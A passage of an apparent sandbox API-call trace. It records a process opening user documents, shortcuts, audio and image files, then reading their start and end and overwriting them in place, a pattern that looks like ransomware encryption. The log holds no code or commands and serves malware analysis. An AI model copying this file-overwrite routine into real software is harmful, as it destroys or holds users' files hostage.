(in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.233] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb425 [0174.233] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.233] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.233] ReleaseMutex (hMutex=0x168) returned 1 [0174.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_0mvv.pptx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0174.233] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_0mvv.pptx", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_0mvv.pptx", lpUsedDefaultChar=0x0) returned 10 [0174.233] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0175.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa425 [0175.171] ReadFile (in: hFile=0x1d8, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0175.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa425 [0175.171] WriteFile (in: hFile=0x1d8, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0175.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0175.172] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0175.172] CloseHandle (hObject=0x1d8) returned 1 [0175.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0175.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0175.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x85 [0175.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0175.173] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.173] ReleaseMutex (hMutex=0x168) returned 1 [0175.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0175.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Home.url", lpUsedDefaultChar=0x0) returned 21 [0175.173] ReadFile (in: hFile=0x1d8, lpBuffer=0x2673930, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673930*, lpNumberOfBytesRead=0x345f2bc*=0x85, lpOverlapped=0x0) returned 1 [0175.174] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0175.174] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0175.175] CloseHandle (hObject=0x1d8) returned 1 [0175.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0175.998] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0175.998] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x85 [0175.998] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0175.998] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.998] ReleaseMutex (hMutex=0x168) returned 1 [0175.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0175.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x1f7328c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSNBC News.url", lpUsedDefaultChar=0x0) returned 14 [0175.999] ReadFile (in: hFile=0x20c, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x345f2bc*=0x85, lpOverlapped=0x0) returned 1 [0176.000] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0176.000] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0176.000] CloseHandle (hObject=0x20c) returned 1 [0176.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x16b [0176.033] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.033] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.033] ReleaseMutex (hMutex=0x168) returned 1 [0176.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RecentPlaces.lnk", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RecentPlaces.lnk", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RecentPlaces.lnk", lpUsedDefaultChar=0x0) returned 16 [0176.033] ReadFile (in: hFile=0x1f0, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x345f2bc*=0x16b, lpOverlapped=0x0) returned 1 [0176.034] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0176.035] WriteFile (in: hFile=0x1f0, lpBuffer=0x2842988*, nNumberOfBytesToWrite=0x6f3, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2842988*, lpNumberOfBytesWritten=0x345f2d0*=0x6f3, lpOverlapped=0x0) returned 1 [0176.035] CloseHandle (hObject=0x1f0) returned 1 [0176.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\DXsSdrVpN3W7Cdf\\6E_y9V8Y0OFTDk48.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\dxssdrvpn3w7cdf\\6e_y9v8y0oftdk48.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.035] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa160 [0176.036] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.036] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.036] ReleaseMutex (hMutex=0x168) returned 1 [0176.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6E_y9V8Y0OFTDk48.mp3", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6E_y9V8Y0OFTDk48.mp3", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6E_y9V8Y0OFTDk48.mp3", lpUsedDefaultChar=0x0) returned 20 [0176.036] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0176.037] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9160 [0176.037] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.037] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9160 [0176.037] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.038] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.038] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0176.038] CloseHandle (hObject=0x1f0) returned 1 [0176.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\kEGn-7rcTvps-n\\LI4AjBp_2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\kegn-7rctvps-n\\li4ajbp_2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.038] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.038] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbc3a [0176.039] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.039] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.039] ReleaseMutex (hMutex=0x168) returned 1 [0176.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LI4AjBp_2.wav", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LI4AjBp_2.wav", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LI4AjBp_2.wav", lpUsedDefaultChar=0x0) returned 13 [0176.039] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0176.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xac3a [0176.040] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.040] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xac3a [0176.040] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.041] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.041] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0176.041] CloseHandle (hObject=0x1f0) returned 1 [0176.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\z lfjHnieP\\BxztB8Ja4Mn4Gby_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\z lfjhniep\\bxztb8ja4mn4gby_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.042] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.042] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xaed7 [0176.042] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.042] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.042] ReleaseMutex (hMutex=0x168) returned 1 [0176.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BxztB8Ja4Mn4Gby_.wav", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BxztB8Ja4Mn4Gby_.wav", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BxztB8Ja4Mn4Gby_.wav", lpUsedDefaultChar=0x0) returned 20 [0176.043] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0176.044] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9ed7 [0176.044] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.044] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9ed7 [0176.044] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.045] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.045] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0176.045] CloseHandle (hObject=0x1f0) returned 1 [0176.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\eTM1AkcIrRWOqrHS7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\etm1akcirrwoqrhs7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x9b70 [0176.046] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.046] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.046] ReleaseMutex (hMutex=0x168) returned 1 [0176.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eTM1AkcIrRWOqrHS7.gif", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eTM1AkcIrRWOqrHS7.gif", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eTM1AkcIrRWOqrHS7.gif", lpUsedDefaultChar=0x0) returned 21 [0176.046] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0176.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8b70 [0176.047] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.047] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8b70 [0176.047] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.048] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0176.048] CloseHandle (hObject=0x1f0) returned 1 [0176.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\qqWgHdGJQ9 j9RZPz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\qqwghdgjq9 j9rzpz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x90ab [0176.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.049] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.049] ReleaseMutex (hMutex=0x168) returned 1 [0176.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qqWgHdGJQ9 j9RZPz.png", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qqWgHdGJQ9 j9RZPz.png", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qqWgHdGJQ9 j9RZPz.png", lpUsedDefaultChar=0x0) returned 21 [0176.049] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: 